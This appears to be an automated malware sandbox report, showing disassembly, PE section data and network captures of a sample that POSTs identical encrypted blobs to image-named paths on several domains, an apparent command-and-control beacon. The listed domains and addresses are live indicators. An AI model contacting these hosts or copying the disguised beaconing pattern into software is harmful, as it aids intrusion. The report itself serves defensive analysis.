                            jmp 00007FC900F06778h
                            push 00000004h
                            pop ebx
                            cmp ax, bx
                            jbe 00007FC900F06770h
                            push 00000008h
                            pop ebx
                            cmp ax, bx
                            jbe 00007FC900F06768h
                            push 00000010h
                            pop ebx
                            cmp ax, bx
                            jbe 00007FC900F06760h
                            cmp ax, si
                            jnbe 00007FC900F06758h
                            mov ebx, esi
                            push 00000028h
                            jmp 00007FC900F06763h
                            push 00000020h
                            pop ebx
                            mov eax, edi
                            mov cl, bl
                            shl eax, cl
                            lea eax, dword ptr [00000028h+eax*4]
                            push eax
                            push 00000040h
                            call dword ptr [0041CAD0h]
                            mov esi, eax
                            push 00000018h
                            mov dword ptr [esi], 00000028h
                            mov eax, dword ptr [ebp-28h]
                            mov dword ptr [esi+04h], eax
                            mov eax, dword ptr [ebp-24h]
                            mov dword ptr [esi+08h], eax
                            mov ax, word ptr [ebp-1Ch]
                            mov word ptr [esi+0Ch], ax
                            mov ax, word ptr [ebp-1Ah]
                            mov word ptr [esi+0Eh], ax
                            pop eax
                            cmp bx, ax
                            jnc 00007FC900F06759h
                            mov cl, bl
                            shl edi, cl
                            mov dword ptr [esi+20h], edi
                            mov eax, dword ptr [esi+04h]
                            xor edi, edi
                            add eax, 07h
                            movzx ecx, bx
                            cdq
                            and edx, 07h
                            mov dword ptr [esi+00h], edi
                            Programming Language:
                            • [ C ] VS2015 UPD3.1 build 24215
                            • [LNK] VS2015 UPD3.1 build 24215
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b0000x53c.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xa1e40xa200False0.5746045524691358data6.579593961840767IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0xc0000xf6500xf800False0.5038117439516129data6.4402375831504814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x1c0000x17dc0x1600False0.947265625data7.744002865043877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .yesewt0x1e0000xc8000xc800False0.5180859375data5.095979651283738IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .reloc0x2b0000x53c0x600False0.7858072916666666data6.183703203858595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 17, 2023 00:51:25.121834040 CET49735443192.168.2.4172.67.132.175
                            Nov 17, 2023 00:51:25.121916056 CET44349735172.67.132.175192.168.2.4
                            Nov 17, 2023 00:51:25.122133970 CET49735443192.168.2.4172.67.132.175
                            Nov 17, 2023 00:51:25.127418995 CET49735443192.168.2.4172.67.132.175
                            Nov 17, 2023 00:51:25.127441883 CET44349735172.67.132.175192.168.2.4
                            Nov 17, 2023 00:51:25.460278034 CET44349735172.67.132.175192.168.2.4
                            Nov 17, 2023 00:51:25.460383892 CET49735443192.168.2.4172.67.132.175
                            Nov 17, 2023 00:51:25.462259054 CET49735443192.168.2.4172.67.132.175
                            Nov 17, 2023 00:51:25.462274075 CET44349735172.67.132.175192.168.2.4
                            Nov 17, 2023 00:51:25.462579966 CET44349735172.67.132.175192.168.2.4
                            Nov 17, 2023 00:51:25.502906084 CET49735443192.168.2.4172.67.132.175
                            Nov 17, 2023 00:51:25.552175999 CET49735443192.168.2.4172.67.132.175
                            Nov 17, 2023 00:51:25.552201986 CET49735443192.168.2.4172.67.132.175
                            Nov 17, 2023 00:51:25.552217960 CET44349735172.67.132.175192.168.2.4
                            Nov 17, 2023 00:51:56.761039972 CET44349735172.67.132.175192.168.2.4
                            Nov 17, 2023 00:51:56.761110067 CET44349735172.67.132.175192.168.2.4
                            Nov 17, 2023 00:51:56.761215925 CET49735443192.168.2.4172.67.132.175
                            Nov 17, 2023 00:51:56.866341114 CET49735443192.168.2.4172.67.132.175
                            Nov 17, 2023 00:51:56.866372108 CET44349735172.67.132.175192.168.2.4
                            Nov 17, 2023 00:51:57.461164951 CET49736443192.168.2.4185.32.57.142
                            Nov 17, 2023 00:51:57.461199045 CET44349736185.32.57.142192.168.2.4
                            Nov 17, 2023 00:51:57.461261988 CET49736443192.168.2.4185.32.57.142
                            Nov 17, 2023 00:51:57.461854935 CET49736443192.168.2.4185.32.57.142
                            Nov 17, 2023 00:51:57.461867094 CET44349736185.32.57.142192.168.2.4
                            Nov 17, 2023 00:51:58.141674042 CET44349736185.32.57.142192.168.2.4
                            Nov 17, 2023 00:51:58.141768932 CET49736443192.168.2.4185.32.57.142
                            Nov 17, 2023 00:51:58.143593073 CET49736443192.168.2.4185.32.57.142
                            Nov 17, 2023 00:51:58.143609047 CET44349736185.32.57.142192.168.2.4
                            Nov 17, 2023 00:51:58.143938065 CET44349736185.32.57.142192.168.2.4
                            Nov 17, 2023 00:51:58.145201921 CET49736443192.168.2.4185.32.57.142
                            Nov 17, 2023 00:51:58.145256042 CET49736443192.168.2.4185.32.57.142
                            Nov 17, 2023 00:51:58.145282030 CET44349736185.32.57.142192.168.2.4
                            Nov 17, 2023 00:51:58.841075897 CET44349736185.32.57.142192.168.2.4
                            Nov 17, 2023 00:51:58.841151953 CET44349736185.32.57.142192.168.2.4
                            Nov 17, 2023 00:51:58.841320992 CET49736443192.168.2.4185.32.57.142
                            Nov 17, 2023 00:51:58.842219114 CET49736443192.168.2.4185.32.57.142
                            Nov 17, 2023 00:51:58.842236996 CET44349736185.32.57.142192.168.2.4
                            Nov 17, 2023 00:51:59.321065903 CET49737443192.168.2.4172.67.219.93
                            Nov 17, 2023 00:51:59.321105957 CET44349737172.67.219.93192.168.2.4
                            Nov 17, 2023 00:51:59.321181059 CET49737443192.168.2.4172.67.219.93
                            Nov 17, 2023 00:51:59.321819067 CET49737443192.168.2.4172.67.219.93
                            Nov 17, 2023 00:51:59.321835041 CET44349737172.67.219.93192.168.2.4
                            Nov 17, 2023 00:51:59.659507990 CET44349737172.67.219.93192.168.2.4
                            Nov 17, 2023 00:51:59.659612894 CET49737443192.168.2.4172.67.219.93
                            Nov 17, 2023 00:51:59.661413908 CET49737443192.168.2.4172.67.219.93
                            Nov 17, 2023 00:51:59.661420107 CET44349737172.67.219.93192.168.2.4
                            Nov 17, 2023 00:51:59.661819935 CET44349737172.67.219.93192.168.2.4
                            Nov 17, 2023 00:51:59.663110018 CET49737443192.168.2.4172.67.219.93
                            Nov 17, 2023 00:51:59.663142920 CET49737443192.168.2.4172.67.219.93
                            Nov 17, 2023 00:51:59.663201094 CET44349737172.67.219.93192.168.2.4
                            Nov 17, 2023 00:52:00.187021971 CET44349737172.67.219.93192.168.2.4
                            Nov 17, 2023 00:52:00.187370062 CET49737443192.168.2.4172.67.219.93
                            Nov 17, 2023 00:52:00.356739044 CET49738443192.168.2.4138.197.111.104
                            Nov 17, 2023 00:52:00.356787920 CET44349738138.197.111.104192.168.2.4
                            Nov 17, 2023 00:52:00.356864929 CET49738443192.168.2.4138.197.111.104
                            Nov 17, 2023 00:52:00.357959986 CET49738443192.168.2.4138.197.111.104
                            Nov 17, 2023 00:52:00.357975960 CET44349738138.197.111.104192.168.2.4
                            Nov 17, 2023 00:52:01.059654951 CET44349738138.197.111.104192.168.2.4
                            Nov 17, 2023 00:52:01.059771061 CET49738443192.168.2.4138.197.111.104
                            Nov 17, 2023 00:52:01.061978102 CET49738443192.168.2.4138.197.111.104
                            Nov 17, 2023 00:52:01.061983109 CET44349738138.197.111.104192.168.2.4
                            Nov 17, 2023 00:52:01.062393904 CET44349738138.197.111.104192.168.2.4
                            Nov 17, 2023 00:52:01.064049006 CET49738443192.168.2.4138.197.111.104
                            Nov 17, 2023 00:52:01.064104080 CET49738443192.168.2.4138.197.111.104
                            Nov 17, 2023 00:52:01.064109087 CET44349738138.197.111.104192.168.2.4
                            Nov 17, 2023 00:52:01.545346022 CET44349738138.197.111.104192.168.2.4
                            Nov 17, 2023 00:52:01.545562983 CET44349738138.197.111.104192.168.2.4
                            Nov 17, 2023 00:52:01.545664072 CET49738443192.168.2.4138.197.111.104
                            Nov 17, 2023 00:52:01.545840979 CET49738443192.168.2.4138.197.111.104
                            Nov 17, 2023 00:52:01.545857906 CET44349738138.197.111.104192.168.2.4
                            Nov 17, 2023 00:52:01.903280973 CET49739443192.168.2.4137.74.231.3
                            Nov 17, 2023 00:52:01.903331995 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:01.903455019 CET49739443192.168.2.4137.74.231.3
                            Nov 17, 2023 00:52:01.904261112 CET49739443192.168.2.4137.74.231.3
                            Nov 17, 2023 00:52:01.904275894 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:02.523845911 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:02.523978949 CET49739443192.168.2.4137.74.231.3
                            Nov 17, 2023 00:52:02.525501013 CET49739443192.168.2.4137.74.231.3
                            Nov 17, 2023 00:52:02.525526047 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:02.525938034 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:02.527440071 CET49739443192.168.2.4137.74.231.3
                            Nov 17, 2023 00:52:02.527506113 CET49739443192.168.2.4137.74.231.3
                            Nov 17, 2023 00:52:02.527514935 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:03.323717117 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:03.323798895 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:03.323837996 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:03.323869944 CET49739443192.168.2.4137.74.231.3
                            Nov 17, 2023 00:52:03.323890924 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:03.323908091 CET49739443192.168.2.4137.74.231.3
                            Nov 17, 2023 00:52:03.323997974 CET44349739137.74.231.3192.168.2.4
                            Nov 17, 2023 00:52:03.324047089 CET49739443192.168.2.4137.74.231.3
                            TimestampSource PortDest PortSource IPDest IP
                            Nov 17, 2023 00:51:24.942881107 CET5776553192.168.2.41.1.1.1
                            Nov 17, 2023 00:51:25.112154961 CET53577651.1.1.1192.168.2.4
                            Nov 17, 2023 00:51:56.873395920 CET6343253192.168.2.41.1.1.1
                            Nov 17, 2023 00:51:57.458929062 CET53634321.1.1.1192.168.2.4
                            Nov 17, 2023 00:51:58.849507093 CET6377953192.168.2.41.1.1.1
                            Nov 17, 2023 00:51:59.152769089 CET53637791.1.1.1192.168.2.4
                            Nov 17, 2023 00:51:59.157489061 CET5538153192.168.2.41.1.1.1
                            Nov 17, 2023 00:51:59.319581985 CET53553811.1.1.1192.168.2.4
                            Nov 17, 2023 00:52:00.192445040 CET6385953192.168.2.41.1.1.1
                            Nov 17, 2023 00:52:00.354856014 CET53638591.1.1.1192.168.2.4
                            Nov 17, 2023 00:52:01.548077106 CET5475353192.168.2.41.1.1.1
                            Nov 17, 2023 00:52:01.901900053 CET53547531.1.1.1192.168.2.4
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 17, 2023 00:51:24.942881107 CET192.168.2.41.1.1.10x3beStandard query (0)p-ride.liveA (IP address)IN (0x0001)false
                            Nov 17, 2023 00:51:56.873395920 CET192.168.2.41.1.1.10x6bb0Standard query (0)avtoboss163.ruA (IP address)IN (0x0001)false
                            Nov 17, 2023 00:51:58.849507093 CET192.168.2.41.1.1.10x4b26Standard query (0)rarefoods.roA (IP address)IN (0x0001)false
                            Nov 17, 2023 00:51:59.157489061 CET192.168.2.41.1.1.10x6cb4Standard query (0)brownswoodblog.comA (IP address)IN (0x0001)false
                            Nov 17, 2023 00:52:00.192445040 CET192.168.2.41.1.1.10x442fStandard query (0)patriotcleaning.netA (IP address)IN (0x0001)false
                            Nov 17, 2023 00:52:01.548077106 CET192.168.2.41.1.1.10x2b9fStandard query (0)so-sage.frA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 17, 2023 00:51:25.112154961 CET1.1.1.1192.168.2.40x3beNo error (0)p-ride.live172.67.132.175A (IP address)IN (0x0001)false
                            Nov 17, 2023 00:51:25.112154961 CET1.1.1.1192.168.2.40x3beNo error (0)p-ride.live104.21.5.3A (IP address)IN (0x0001)false
                            Nov 17, 2023 00:51:57.458929062 CET1.1.1.1192.168.2.40x6bb0No error (0)avtoboss163.ru185.32.57.142A (IP address)IN (0x0001)false
                            Nov 17, 2023 00:51:59.152769089 CET1.1.1.1192.168.2.40x4b26Name error (3)rarefoods.rononenoneA (IP address)IN (0x0001)false
                            Nov 17, 2023 00:51:59.319581985 CET1.1.1.1192.168.2.40x6cb4No error (0)brownswoodblog.com172.67.219.93A (IP address)IN (0x0001)false
                            Nov 17, 2023 00:51:59.319581985 CET1.1.1.1192.168.2.40x6cb4No error (0)brownswoodblog.com104.21.43.44A (IP address)IN (0x0001)false
                            Nov 17, 2023 00:52:00.354856014 CET1.1.1.1192.168.2.40x442fNo error (0)patriotcleaning.net138.197.111.104A (IP address)IN (0x0001)false
                            Nov 17, 2023 00:52:01.901900053 CET1.1.1.1192.168.2.40x2b9fNo error (0)so-sage.fr137.74.231.3A (IP address)IN (0x0001)false
                            • p-ride.live
                            • avtoboss163.ru
                            • brownswoodblog.com
                            • patriotcleaning.net
                            • so-sage.fr
                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.449735172.67.132.175443C:\Users\user\Desktop\RQzHm5vLxs.exe
                            TimestampkBytes transferredDirectionData
                            2023-11-16 23:51:25 UTC0OUTPOST /data/image/oe.gif HTTP/1.1
                            Cache-Control: no-cache
                            Connection: close
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                            Content-Length: 870
                            Host: p-ride.live
                            2023-11-16 23:51:25 UTC0OUTData Raw: 16 4f e1 0b 1d df ba 5d f2 1a d1 04 36 b0 45 11 d8 58 8d 73 76 3a 14 82 2e 8a 0c 1b f1 b5 6e 11 75 ea d0 27 be 58 68 27 21 aa a5 01 78 cd bb 17 b6 be 21 f3 40 0d 6e 23 c1 8b 89 0d 89 3a ca e7 0d b4 55 ab a1 da 95 64 8b f9 6b 43 65 9c 6b 91 05 b1 1d 8a 46 09 6f f5 b3 77 31 00 15 a9 b6 8e a4 a0 10 90 b2 ae ab 37 a2 9e 95 22 7d c3 29 96 59 45 34 c5 94 8a af d2 87 6a a0 a0 59 8e c0 50 2a 1c 1d 58 fb c9 15 7b 10 cd 17 ff a8 e9 c2 e4 63 d1 70 71 19 e6 e4 4c 6c cf 0b 14 e5 f8 38 93 43 45 38 a9 b4 10 49 3b 0a 10 d2 e6 0b 25 b6 c5 8c d8 0b 79 3c c1 0b 6a 64 8e 01 9a 40 bc f4 cc 94 f1 00 21 2d b2 0f 1d 03 46 3e c4 46 b1 25 d0 3e 05 60 11 d9 9f 44 8e e1 f2 4b af ca c5 42 38 50 91 90 58 84 68 8a c6 3d 31 7c bf ed c8 dc ea ee 67 78 8f 8e 29 56 1e 2c 0b 9d 9b 42 3c 02
                            Data Ascii: O]6EXsv:.nu'Xh'!x!@n#:UdkCekFow17"})YE4jYP*X{cpqLl8CE8I;%y<jd@!-F>F%>`DKB8PXh=1|gx)V,B<
                            2023-11-16 23:51:56 UTC1INHTTP/1.1 522
                            Date: Thu, 16 Nov 2023 23:51:56 GMT
                            Content-Type: text/plain; charset=UTF-8
                            Content-Length: 15
                            Connection: close
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UFhkW%2B60t5x9dP%2F9Lw1EHy0lzTAhZXrKoj7IZJd7ECOFQiX%2FkoaoSkkfhtGYoBYbgwcuKgnDda2jBmtEFzC35UWDtpD7BpGa5xJZFEofOAh5RnoWIpf5NEdBiUF6DA%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            X-Frame-Options: SAMEORIGIN
                            Referrer-Policy: same-origin
                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                            Server: cloudflare
                            CF-RAY: 8273a451bb147208-SEA
                            alt-svc: h3=":443"; ma=86400
                            2023-11-16 23:51:56 UTC1INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                            Data Ascii: error code: 522


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.449736185.32.57.142443C:\Users\user\Desktop\RQzHm5vLxs.exe
                            TimestampkBytes transferredDirectionData
                            2023-11-16 23:51:58 UTC1OUTPOST /static/assets/hbhezx.png HTTP/1.1
                            Cache-Control: no-cache
                            Connection: close
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                            Content-Length: 870
                            Host: avtoboss163.ru
                            2023-11-16 23:51:58 UTC2OUTData Raw: 16 4f e1 0b 1d df ba 5d f2 1a d1 04 36 b0 45 11 d8 58 8d 73 76 3a 14 82 2e 8a 0c 1b f1 b5 6e 11 75 ea d0 27 be 58 68 27 21 aa a5 01 78 cd bb 17 b6 be 21 f3 40 0d 6e 23 c1 8b 89 0d 89 3a ca e7 0d b4 55 ab a1 da 95 64 8b f9 6b 43 65 9c 6b 91 05 b1 1d 8a 46 09 6f f5 b3 77 31 00 15 a9 b6 8e a4 a0 10 90 b2 ae ab 37 a2 9e 95 22 7d c3 29 96 59 45 34 c5 94 8a af d2 87 6a a0 a0 59 8e c0 50 2a 1c 1d 58 fb c9 15 7b 10 cd 17 ff a8 e9 c2 e4 63 d1 70 71 19 e6 e4 4c 6c cf 0b 14 e5 f8 38 93 43 45 38 a9 b4 10 49 3b 0a 10 d2 e6 0b 25 b6 c5 8c d8 0b 79 3c c1 0b 6a 64 8e 01 9a 40 bc f4 cc 94 f1 00 21 2d b2 0f 1d 03 46 3e c4 46 b1 25 d0 3e 05 60 11 d9 9f 44 8e e1 f2 4b af ca c5 42 38 50 91 90 58 84 68 8a c6 3d 31 7c bf ed c8 dc ea ee 67 78 8f 8e 29 56 1e 2c 0b 9d 9b 42 3c 02
                            Data Ascii: O]6EXsv:.nu'Xh'!x!@n#:UdkCekFow17"})YE4jYP*X{cpqLl8CE8I;%y<jd@!-F>F%>`DKB8PXh=1|gx)V,B<
                            2023-11-16 23:51:58 UTC2INHTTP/1.1 404 Not Found
                            server: nginx
                            date: Thu, 16 Nov 2023 23:51:58 GMT
                            content-type: text/html; charset=UTF-8
                            transfer-encoding: chunked
                            vary: Accept-Encoding
                            x-unique-id: 9C9231A8:A25E_B920398E:01BB_6556AB1D3AB377C082
                            set-cookie: stats=1; expires=Thu, 23-Nov-2023 23:51:58 GMT; Max-Age=604800; path=/; domain=avtoboss163.ru
                            strict-transport-security: max-age=10
                            x-reason: no_render
                            vary: Cookie
                            pragma: no-cache
                            last-modified: Thu, 16 Nov 2023 21:49:18 GMT
                            cache-control: must-revalidate, max-age=0
                            expires: Thu, 16 Nov 2023 21:49:18 GMT
                            x-xss-protection: 1; mode=block
                            connection: close
                            2023-11-16 23:51:58 UTC3INData Raw: 31 38 0d 0a 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 68 31 3e 0a 0a 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 18<h1>404 Not Found<h1>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            2192.168.2.449737172.67.219.93443C:\Users\user\Desktop\RQzHm5vLxs.exe
                            TimestampkBytes transferredDirectionData
                            2023-11-16 23:51:59 UTC3OUTPOST /admin/pics/hdxsmg.gif HTTP/1.1
                            Cache-Control: no-cache
                            Connection: close
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                            Content-Length: 870
                            Host: brownswoodblog.com
                            2023-11-16 23:51:59 UTC3OUTData Raw: 16 4f e1 0b 1d df ba 5d f2 1a d1 04 36 b0 45 11 d8 58 8d 73 76 3a 14 82 2e 8a 0c 1b f1 b5 6e 11 75 ea d0 27 be 58 68 27 21 aa a5 01 78 cd bb 17 b6 be 21 f3 40 0d 6e 23 c1 8b 89 0d 89 3a ca e7 0d b4 55 ab a1 da 95 64 8b f9 6b 43 65 9c 6b 91 05 b1 1d 8a 46 09 6f f5 b3 77 31 00 15 a9 b6 8e a4 a0 10 90 b2 ae ab 37 a2 9e 95 22 7d c3 29 96 59 45 34 c5 94 8a af d2 87 6a a0 a0 59 8e c0 50 2a 1c 1d 58 fb c9 15 7b 10 cd 17 ff a8 e9 c2 e4 63 d1 70 71 19 e6 e4 4c 6c cf 0b 14 e5 f8 38 93 43 45 38 a9 b4 10 49 3b 0a 10 d2 e6 0b 25 b6 c5 8c d8 0b 79 3c c1 0b 6a 64 8e 01 9a 40 bc f4 cc 94 f1 00 21 2d b2 0f 1d 03 46 3e c4 46 b1 25 d0 3e 05 60 11 d9 9f 44 8e e1 f2 4b af ca c5 42 38 50 91 90 58 84 68 8a c6 3d 31 7c bf ed c8 dc ea ee 67 78 8f 8e 29 56 1e 2c 0b 9d 9b 42 3c 02
                            Data Ascii: O]6EXsv:.nu'Xh'!x!@n#:UdkCekFow17"})YE4jYP*X{cpqLl8CE8I;%y<jd@!-F>F%>`DKB8PXh=1|gx)V,B<
                            2023-11-16 23:52:00 UTC4INHTTP/1.1 301 Moved Permanently
                            Date: Thu, 16 Nov 2023 23:52:00 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            Location: http://brownswoodblog.com/
                            X-Frame-Options: SAMEORIGIN
                            X-XSS-Protection: 1; mode=block
                            X-Content-Type-Options: nosniff
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=886MnvvzMILtQsRFlwZYokHPD0RZiLhJC8PCCPNWwjjlPsUJLsdQ9c1Lp1dl%2FlE04fngr9%2FgHUwKymFiTJjp7PRlha5oov9TCzwZafIzDI13ASlBsJLesrq7IVX%2Bn7uYh7f4YRo%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8273a5276dfbeba7-SEA
                            alt-svc: h3=":443"; ma=86400
                            2023-11-16 23:52:00 UTC5INData Raw: 39 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                            Data Ascii: 9b<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                            2023-11-16 23:52:00 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            3192.168.2.449738138.197.111.104443C:\Users\user\Desktop\RQzHm5vLxs.exe
                            TimestampkBytes transferredDirectionData
                            2023-11-16 23:52:01 UTC5OUTPOST /admin/graphic/ervzot.jpg HTTP/1.1
                            Cache-Control: no-cache
                            Connection: close
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                            Content-Length: 870
                            Host: patriotcleaning.net
                            2023-11-16 23:52:01 UTC5OUTData Raw: 16 4f e1 0b 1d df ba 5d f2 1a d1 04 36 b0 45 11 d8 58 8d 73 76 3a 14 82 2e 8a 0c 1b f1 b5 6e 11 75 ea d0 27 be 58 68 27 21 aa a5 01 78 cd bb 17 b6 be 21 f3 40 0d 6e 23 c1 8b 89 0d 89 3a ca e7 0d b4 55 ab a1 da 95 64 8b f9 6b 43 65 9c 6b 91 05 b1 1d 8a 46 09 6f f5 b3 77 31 00 15 a9 b6 8e a4 a0 10 90 b2 ae ab 37 a2 9e 95 22 7d c3 29 96 59 45 34 c5 94 8a af d2 87 6a a0 a0 59 8e c0 50 2a 1c 1d 58 fb c9 15 7b 10 cd 17 ff a8 e9 c2 e4 63 d1 70 71 19 e6 e4 4c 6c cf 0b 14 e5 f8 38 93 43 45 38 a9 b4 10 49 3b 0a 10 d2 e6 0b 25 b6 c5 8c d8 0b 79 3c c1 0b 6a 64 8e 01 9a 40 bc f4 cc 94 f1 00 21 2d b2 0f 1d 03 46 3e c4 46 b1 25 d0 3e 05 60 11 d9 9f 44 8e e1 f2 4b af ca c5 42 38 50 91 90 58 84 68 8a c6 3d 31 7c bf ed c8 dc ea ee 67 78 8f 8e 29 56 1e 2c 0b 9d 9b 42 3c 02
                            Data Ascii: O]6EXsv:.nu'Xh'!x!@n#:UdkCekFow17"})YE4jYP*X{cpqLl8CE8I;%y<jd@!-F>F%>`DKB8PXh=1|gx)V,B<
                            2023-11-16 23:52:01 UTC6INHTTP/1.1 404 Not Found
                            Server: nginx/1.21.6
                            Date: Thu, 16 Nov 2023 23:52:01 GMT
                            Content-Type: text/html
                            Content-Length: 150
                            Connection: close
                            Vary: Accept-Encoding
                            Set-Cookie: _uid=CgE5FmVWqyE3lQA/JZtvAg==; expires=Fri, 17-Nov-23 23:52:01 GMT; path=/
                            Strict-Transport-Security: max-age=31536000
                            2023-11-16 23:52:01 UTC6INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.449739137.74.231.3443C:\Users\user\Desktop\RQzHm5vLxs.exe
                            TimestampkBytes transferredDirectionData
                            2023-11-16 23:52:02 UTC7OUTPOST /news/game/bvprbb.png HTTP/1.1
                            Cache-Control: no-cache
                            Connection: close
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                            Content-Length: 870
                            Host: so-sage.fr
